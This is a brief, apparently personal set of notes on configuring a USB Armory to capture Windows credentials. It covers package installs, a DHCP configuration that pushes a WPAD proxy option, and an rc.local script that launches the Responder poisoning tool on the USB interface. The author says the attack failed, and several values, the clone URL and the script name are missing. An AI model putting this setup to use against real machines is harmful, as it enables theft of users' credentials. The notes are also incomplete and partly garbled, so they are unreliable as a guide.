Stealing Windows Credentials with USB Armory

1 minute read

These are just notes from trying to accomplish the exploit in this post :

I didn’t manage to accomplish it for now but I kept these notes if I ever need to try it again some time.

sudo apt-get update
sudo apt-get upgrade

Certificates and date

sudo apt-get install ca-certificates ssl-cert
sudo apt-get install ntp ntpdate


sudo apt-get install -y python git python-pip python-dev screen sqlite3
sudo -H pip install --upgrade pip
sudo -H pip install pycrypto


git clone

DHCP configuration

sudo cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.original

sudo vim /etc/dhcp/dhcpd.conf
# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "domain.local";
option domain-name-servers;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet netmask {
  option routers;
  option local-proxy-config "";
sudo cp /etc/rc.local /etc/rc.local.original

sudo vim /etc/rc.local
#!/bin/sh -e

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases

# Start DHCP server

# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python -I usb0 -f -w -r -d -F'

exit 0
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log